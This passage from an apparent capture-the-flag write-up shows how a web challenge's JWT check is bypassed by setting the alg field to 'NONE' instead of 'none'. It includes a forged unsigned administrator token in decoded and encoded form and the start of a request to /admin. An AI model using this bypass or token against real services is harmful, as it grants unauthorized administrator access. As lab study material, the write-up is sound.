Ramoreik/HTB-CTF-CyberApocalypse-2023-writeups/web/didactic-octopaddle.md

     }
 ```

 Maybe I can dodge signature validation ?

 Something like a default value for it, or specifying an unsafe algorithm.

 While tinkering with this condition locally, I found an authentication bypass.

 The condition is that the `decoded.header.alg` value equals the string `'none'`.
 There could be a way to bypass this, if the underlying library normalizes the `alg` values coming in the `verify` function.

 This is how we bypass it, we simply specify the `alg` as `'NONE'` instead.
 This goes through to the `else`, which decodes the value and treats the token as valid.

 Using this, we can craft an administrator token.

 Here is our JWT:

 ```json
 {"alg":"NONE","typ":"JWT"}{"id":1,"iat":1679153124,"exp":1679156724}
 ```

 `alg`: `"NONE"` will bypass the condition.
 `id`: 1 represents the administrator user.

 We encode it:
 ```
 eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJpZCI6MSwiaWF0IjoxNjc5MTUzMTI0LCJleHAiOjE2NzkxNTY3MjR9.
 ```

-HERE WE GOOOOO :
+HERE WE GOOOOO:
 ```http
 GET /admin HTTP/1.1
 Host: 10.18.232.1:1337